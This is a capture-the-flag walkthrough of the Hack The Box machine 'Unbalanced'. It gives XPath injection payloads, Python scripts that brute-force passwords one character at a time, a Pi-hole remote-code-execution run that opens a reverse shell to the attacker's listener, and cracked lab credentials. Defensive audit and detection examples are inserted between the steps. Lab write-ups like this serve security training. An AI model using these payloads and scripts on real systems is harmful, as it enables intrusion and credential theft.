Hack-The-Box-walkthrough[Unbalanced]

Introduction

OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200

User Blood : InfoSecJack 00 days, 01 hours, 49 mins, 26 seconds.
Root Blood : snowscan 00 days, 02 hours, 09 mins, 09 seconds.

  • my htb rank

information gathering

First, run nmap as usual:

root@kali:~# nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Rsync

root@kali:~/hackthebox/machine/unbalanced# nc -vn 10.10.10.200 873
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.200:873.
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
conf_backups EncFS-encrypted configuration backups
@RSYNCD: EXIT
exit
Ncat: Broken pipe.

Downloading the files:

root@kali:~/hackthebox/machine/unbalanced# rsync -av rsync://10.10.10.200/conf_backups files
receiving incremental file list
created directory files
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5

sent 1,452 bytes received 411,990 bytes 10,466.89 bytes/sec
total size is 405,603 speedup is 0.98

We can see these files are encrypted:

  • EncFS-encrypted

After searching for how to decrypt them, I found the following post on how to recover the password:

  • Breaking EncFS given .encfs6.xml

Getting the password:

root@kali:~# cd /usr/share/john/
root@kali:/usr/share/john# python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > /root/hackthebox/machine/unbalanced/encfs6.xml.john
root@kali:/usr/share/john# john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 --pot=s3cwalk.pot /root/hackthebox/machine/unbalanced/encfs6.xml.john
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 0.00% (ETA: 2020-08-20 04:24) 0g/s 61.34p/s 61.34c/s 61.34C/s alyssa..horses
0g 0:00:00:06 0.00% (ETA: 2020-08-20 09:26) 0g/s 61.53p/s 61.53c/s 61.53C/s jeffrey..jerome
0g 0:00:00:09 0.00% (ETA: 2020-08-20 11:45) 0g/s 62.60p/s 62.60c/s 62.60C/s evelyn..flores
bubblegum (/root/hackthebox/machine/unbalanced/files/)
1g 0:00:00:11 DONE (2020-08-17 09:53) 0.08583g/s 63.17p/s 63.17c/s 63.17C/s bambam..raquel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • password is: bubblegum

  • Reading the files:

apt-get install encfs
root@kali:~/hackthebox/machine/unbalanced# encfsctl export files decrypt
EncFS密码:
目录decrypt不存在。
目录"decrypt" 不存在。要创建吗?(y,N) y
root@kali:~/hackthebox/machine/unbalanced# ls
decrypt encfs6.xml.john files
root@kali:~/hackthebox/machine/unbalanced# ls decrypt/
50-localauthority.conf hdparm.conf parser.conf
50-nullbackend.conf host.conf protect-links.conf
51-debian-sudo.conf initramfs.conf reportbug.conf
70debconf input.conf resolv.conf
99-sysctl.conf journald.conf resolved.conf
access.conf kernel-img.conf rsyncd.conf
adduser.conf ldap.conf rsyslog.conf
bluetooth.conf ld.so.conf semanage.conf
ca-certificates.conf libaudit.conf sepermit.conf
com.ubuntu.SoftwareProperties.conf libc.conf sleep.conf
dconf limits.conf squid.conf
debconf.conf listchanges.conf sysctl.conf
debian.conf logind.conf system.conf
deluser.conf logrotate.conf time.conf
dhclient.conf main.conf timesyncd.conf
discover-modprobe.conf mke2fs.conf ucf.conf
dkms.conf modules.conf udev.conf
dns.conf namespace.conf update-initramfs.conf
dnsmasq.conf network.conf user.conf
docker.conf networkd.conf user-dirs.conf
fakeroot-x86_64-linux-gnu.conf nsswitch.conf Vendor.conf
framework.conf org.freedesktop.PackageKit.conf wpa_supplicant.conf
fuse.conf PackageKit.conf x86_64-linux-gnu.conf
gai.conf pam.conf xattr.conf
group.conf pam_env.conf

This gives us a lot of config files.

After enumerating them, it turns out the one we need is squid.conf.

It is a huge file, so use sed to keep only the active (non-comment) lines:

root@kali:~/hackthebox/machine/unbalanced# sed '/^#/ d' < decrypt/squid.conf > readable.txt
root@kali:~/hackthebox/machine/unbalanced# cat readable.txt
...
a hostname: intranet.unbalanced.htb
a password: Thah$Sh1
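As an added example (my code, not part of the original post), here is a small Python audit that does what the sed one-liner does, keeping only the active lines, and then pulls out every cachemgr_passwd directive to show exactly what a leaked copy of this file hands over. The configuration it parses is constructed for the example and is not the box's real squid.conf.

```python
from typing import Dict, List

# Constructed sample, not the box's real squid.conf: a handful of live
# directives buried in the comment-heavy default file.
SAMPLE_SQUID_CONF = """\
#
# Recommended minimum configuration:
#
acl localnet src 172.31.0.0/16
acl Safe_ports port 80
#http_access deny !Safe_ports
http_access allow localnet

http_port 3128
# Cache manager access: a cleartext password unlocks the mgr: reports
cachemgr_passwd s3cret-example all
cachemgr_passwd disable shutdown
"""


def active_lines(text: str) -> List[str]:
    """Keep only directives squid acts on: drop full-line comments (what
    `sed '/^#/ d'` does) and, going one step further, blank lines too."""
    kept = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            kept.append(line)
    return kept


def cachemgr_passwords(lines: List[str]) -> List[Dict[str, object]]:
    """Parse `cachemgr_passwd <password> <action> [action ...]` directives.
    The words `disable` and `none` are squid keywords (block / no password),
    so only other values are real cleartext secrets."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "cachemgr_passwd":
            findings.append({
                "password": parts[1],
                "actions": parts[2:],
                "cleartext": parts[1] not in ("disable", "none"),
            })
    return findings


def audit_squid_conf(text: str) -> Dict[str, object]:
    """Summarise what someone who reads this file (e.g. from an exposed
    backup) gains: which cache-manager actions a cleartext password unlocks."""
    lines = active_lines(text)
    exposed = [f for f in cachemgr_passwords(lines) if f["cleartext"]]
    return {
        "active_line_count": len(lines),
        "cleartext_cachemgr_passwords": len(exposed),
        "actions_unlocked": sorted({a for f in exposed for a in f["actions"]}),
    }


if __name__ == "__main__":
    for line in active_lines(SAMPLE_SQUID_CONF):
        print(line)
    print(audit_squid_conf(SAMPLE_SQUID_CONF))
```

The finding this reports is the one the walkthrough exploits: the cache manager password sits in cleartext and unlocks every mgr: report. Restricting the manager interface to localhost in http_access and setting `cachemgr_passwd disable all` removes that exposure even when the file leaks through a backup.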

The squid config gave us a password, and with it squidclient can pull more information out of the proxy's cache manager:

root@kali:~/hackthebox/machine/unbalanced# squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Mon, 17 Aug 2020 15:07:05 GMT
Content-Type: text/plain;charset=utf-8
Expires: Mon, 17 Aug 2020 15:07:05 GMT
Last-Modified: Mon, 17 Aug 2020 15:07:05 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 9
FQDNcache Entries Cached: 8
FQDNcache Requests: 96
FQDNcache Hits: 0
FQDNcache Negative Hits: 0
FQDNcache Misses: 96
FQDN Cache Contents:

Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters

Web/proxy

Visit:

http://10.10.10.200:3128/

Squid is running on port 3128.

Now set up the proxy and see whether we can reach the web page:

  • intranet.unbalanced.htb

  • configure FoxyProxy:

Set the browser proxy to HTTP protocol, IP 10.10.10.200, port 3128.

After setting that up, we can access the following page:

http://intranet.unbalanced.htb/intranet.php

After some enumeration we couldn't find anything interesting, but looking back at the squid output we can see something odd:

172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb

Host number one is missing. When we go to

http://172.31.179.1

we get the following:

Host temporarily taken out of load balancing for security maintenance. 

It turns out this host is up but has been taken out of the load balancer, and as the message says, for a reason.

http://172.31.179.1/intranet.php

We get the same page, but here the login form is vulnerable to XPath injection.

Payload:

'or''='

The page then shows the following entries:

rita
Rita Fubelli
rita@unbalanced.htb
Role: HR Manager

jim
Jim Mickelson
jim@unbalanced.htb
Role: Web Designer

bryan
Bryan Angstrom
bryan@unbalanced.htb
Role: System Administrator

sarah
Sarah Goodman
sarah@unbalanced.htb
Role: Team Leader

With the following injection in the password field we can brute-force the passwords:

'or substring(Password,1,1)='p' or'

Every user whose password starts with the letter p is now displayed on the page.
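To see why the form breaks, here is an added example (my code, not the box's PHP) that builds the same kind of login predicate two ways: by plain concatenation, which is what the payloads above exploit, and with properly bounded XPath literals. It assumes the XML holds user elements with Username and Password children, as the payloads imply; the user table and passwords at the bottom are constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Dict


def xpath_string_literal(value: str) -> str:
    """Render an arbitrary string as one XPath 1.0 string literal.
    XPath has no escape sequences, so choose a quote character the value
    does not contain, or stitch pieces together with concat() if it has both."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = []
    for chunk in value.split("'"):
        if chunk:
            pieces.append(f"'{chunk}'")
        pieces.append('"\'"')          # the single quote itself, double-quoted
    pieces.pop()                       # no separator after the last chunk
    return "concat(" + ", ".join(pieces) + ")"


def login_query_vulnerable(user: str, password: str) -> str:
    # Plain concatenation: a quote in the input closes the literal and the
    # rest of the input is parsed as XPath syntax.
    return f"//user[Username='{user}' and Password='{password}']"


def login_query_hardened(user: str, password: str) -> str:
    # Same query, but each user-controlled value is a properly bounded literal,
    # so the whole input is compared as data.
    return (f"//user[Username={xpath_string_literal(user)} and "
            f"Password={xpath_string_literal(password)}]")


# The stronger design: keep no plaintext in the XML and run no query
# language over attacker-controlled input at all.

def pbkdf2_hash(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def make_user_db() -> Dict[str, Dict[str, bytes]]:
    """Constructed user table holding only salted hashes (example passwords,
    not the box's)."""
    db = {}
    for name, pw in (("rita", "example-pass-1"), ("jim", "example-pass-2")):
        salt = os.urandom(16)
        db[name] = {"salt": salt, "hash": pbkdf2_hash(pw, salt)}
    return db


def verify_login(db: Dict[str, Dict[str, bytes]], username: str, password: str) -> bool:
    rec = db.get(username)             # exact-key lookup, nothing to inject into
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], pbkdf2_hash(password, rec["salt"]))


if __name__ == "__main__":
    payload = "'or''='"
    print(login_query_vulnerable("", payload))
    print(login_query_hardened("", payload))
    db = make_user_db()
    print(verify_login(db, "rita", "example-pass-1"), verify_login(db, "rita", payload))
```

With the page's payload the vulnerable builder yields `//user[Username='' and Password=''or''='']`, a predicate that is true for every user, which is exactly why the whole directory was dumped. The hardened builder keeps the payload inside one literal. Libraries that support XPath variables (lxml's `xpath(expr, user=..., pw=...)`, for instance) are a cleaner way to get the same effect, and storing only salted hashes means a character-at-a-time extraction has no plaintext to recover in the first place.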

Write a Python script to brute-force the password; the payload tests a single character at a time.

crack.py

import requests

url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
# character set tried at every password position
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita', 'jim', 'bryan', 'sarah']

for user in u:
    # baseline: substring(Password,0,1) never matches, so this is the "no match" page size
    data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
    request = requests.post(url, data=data, proxies={'http': proxy_url})
    b = len(request.text)
    cracked_pass = ''
    print('Attempting User {0}'.format(user))
    for i in range(1, 80):
        found = False
        for c in w:
            # true only when character i of this user's password equals c
            data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c}
            request = requests.post(url, data=data, proxies={'http': proxy_url})
            if len(request.text) != b:
                found = True
                break
        if not found:
            # no character matched at this position: end of the password
            break
        print('[+]Found character: {0}'.format(c))
        cracked_pass += c
    print(cracked_pass)

Or the crack1.py script:

import requests

url = "http://172.31.179.1/intranet.php"
proxy = "http://10.10.10.200:3128"
letters = "abcdefghijklmnopqrstuvwxyz0123456789!@#$%"
users = ['sarah', 'rita', 'jim', 'bryan']

for user in users:
    data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,1,1)='p' or'"}
    request = requests.post(url, data=data, proxies={'http': proxy})
    length = len(request.text)
    p4ss = ''
    for i in range(1, 25):
        for l in letters:
            # test whether character i of this user's password is l
            data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,{},1)='{}' or'".format(i, l)}
            request1 = requests.post(url, data=data, proxies={'http': proxy})
            # 6756 is the page length observed for a non-matching guess
            if "{}@unbalanced.htb".format(user) in request1.text and len(request1.text) != 6756:
                print("Got hit for User '{}' - Letter is '{}'".format(user, l))
                p4ss += l
                print(str(i))
    print(str(p4ss))
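Both scripts above leave a very recognisable footprint: hundreds of POSTs to one form from a single address in a short time, with responses of only two sizes (the "match" page and the "no match" page). As an added example (not part of the original post), this Python sketch shows how that pattern can be picked out of an ordinary web or proxy access log. The log lines are constructed for the example, and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Apache/nginx "combined" format. POST bodies (where the injected XPath lives)
# are never in the access log, so detection rests on request rate and on the
# tell-tale response pattern of a boolean oracle: only two or three distinct
# sizes across hundreds of requests.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def make_sample_log() -> List[str]:
    """Constructed sample: one client driving the login form one character at
    a time (two requests a second, answers of only two sizes) next to a few
    ordinary page views from another address."""
    base = datetime(2020, 8, 17, 15, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(120):
        ts = (base + timedelta(seconds=i // 2)).strftime(TS_FMT)
        size = 6801 if i % 7 == 0 else 6756     # "hit" page vs "no match" page
        lines.append(f'10.10.14.5 - - [{ts}] "POST /intranet.php HTTP/1.1" 200 {size}')
    for i in range(3):
        ts = (base + timedelta(minutes=i)).strftime(TS_FMT)
        lines.append(f'10.10.10.4 - - [{ts}] "GET /intranet.php HTTP/1.1" 200 {7000 + 40 * i}')
    return lines


def detect_form_bruteforce(lines: List[str], path: str = "/intranet.php",
                           threshold: int = 50,
                           window: timedelta = timedelta(seconds=60)) -> List[dict]:
    """Alert on any client that POSTs to `path` more than `threshold` times
    inside a sliding `window`, reporting how many distinct response sizes it
    received over that burst."""
    by_client: Dict[str, List[dict]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            by_client[rec["host"]].append(rec)

    alerts = []
    for host, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            if end - start + 1 > threshold:
                burst = recs[start:end + 1]
                alerts.append({
                    "client": host,
                    "requests_in_window": len(burst),
                    "distinct_sizes": len({r["size"] for r in burst}),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_form_bruteforce(make_sample_log()):
        print(alert)
```

The same rule applied to squid's own access.log would catch the traffic even earlier, since every request here transits the proxy. A login form that logged failed attempts with the submitted username would make the alert far more specific than a bare request count.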

Using Burp Intruder to brute-force is also a good option; for the Burp setup, see:

  • sevwalk’s unbalanced walkthrough

After running those scripts, we get:

rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'

After trying them all, bryan's password logs us in over SSH, and we get the user flag:

root@kali:~# ssh bryan@10.10.10.200
The authenticity of host '10.10.10.200 (10.10.10.200)' can't be established.
ECDSA key fingerprint is SHA256:aiHhPmnhyt434Qvr9CpJRZOmU7m1R1LI29c11na1obY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.200' (ECDSA) to the list of known hosts.
bryan@10.10.10.200's password:
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 17 14:16:06 2020 from 10.10.10.4
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ whoami
bryan
bryan@unbalanced:~$ ls
TODO user.txt
bryan@unbalanced:~$ cat user.txt
51dfe0d5a9a3981ca4fdbfee0619d773

Privilege Escalation

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]

There was a suspicious TODO file in Bryan's home folder. What is in progress is vulnerable, so Pi-hole may be the way to privilege escalation. The Pi-hole server runs in Docker and can only be accessed via localhost. Let's find which port it is listening on.

bryan@unbalanced:~$ ss -lnpt | grep 127.0.0.1
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 127.0.0.1:5553 0.0.0.0:*
bryan@unbalanced:~$ curl http://127.0.0.1:5553/
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080/
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

It seems I need a domain name for the Pi-hole server. Then I ran the linpeas enumeration script on the box, which showed:

172.31.179.2 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:02 STALE
172.31.11.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:0b:03 STALE
172.31.179.1 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:01 STALE
172.31.179.3 dev br-742fc4eb92b1 lladdr 02:42:ac:1f:b3:03 STALE
10.10.10.2 dev ens160 lladdr 00:50:56:b9:f9:ab REACHABLE
fe80::250:56ff:feb9:f9ab dev ens160 lladdr 00:50:56:b9:f9:ab router STALE

It looks like we found the IP of the Pi-hole web page:

bryan@unbalanced:~$ curl 172.31.11.3

<html><head>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<link rel='stylesheet' href='/pihole/blockingpage.css' type='text/css'/>
</head><body id='splashpage'><img src='/admin/img/logo.svg'/><br/>Pi-<b>hole</b>: Your black hole for Internet advertisements<br><a href='/admin'>Did you mean to go to the admin panel?</a></body></html>

Turn the proxy on again, view the page, and we are able to log in with the default creds.

Log in with: admin

http://172.31.11.3/admin/

Found the following exploit for pi-hole:

  • Pi-hole 4.4.0 - Remote Code Execution (Authenticated)

Since the exploit is not written to go through a proxy server, we can do one of two things: change the exploit or use SSH tunneling:

ssh -L 81:172.31.11.3:80 bryan@10.10.10.200

Then browse to:

http://127.0.0.1:81/admin/

Use the PoC from GitHub:

  • CVE-2020-8816

Run the script and we get a reverse shell:

root@kali:~/hackthebox/machine/unbalanced# python exp2.py http://127.0.0.1:81 admin 10.10.14.5 3344
Attempting to verify if Pi-hole version is vulnerable
Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload
root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.200.
Ncat: Connection from 10.10.10.200:38602.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Boom! We get a shell in the Docker container.

Privilege Escalation–Information Disclosure–Root:

Found a password in a script file:

bUbBl3gUm$43v3Ry0n3!
$ cd /root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb

Then we use the password to get root. Wow, easy root!

bryan@unbalanced:~$ su root
Password:
root@unbalanced:/home/bryan# cd
root@unbalanced:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:~# whoami
root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root
cat: root: No such file or directory
root@unbalanced:~# cat root.txt
9c9972cb01af0521dc17b015c30103c3

Summary of knowledge

  • Rsync download files
  • EncFS password decrypted
  • sed grep the active lines
  • use squidclient to see more information
  • set http-proxy Squid http proxy to access the webpage
  • exploit with xpath injection
  • python script or burp intruder to fuzz xpath payload args
  • Pi-hole 4.4.0 - Remote Code Execution (Authenticated)
  • ssh tunneling port to 127.0.0.1
  • root password disclosure

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…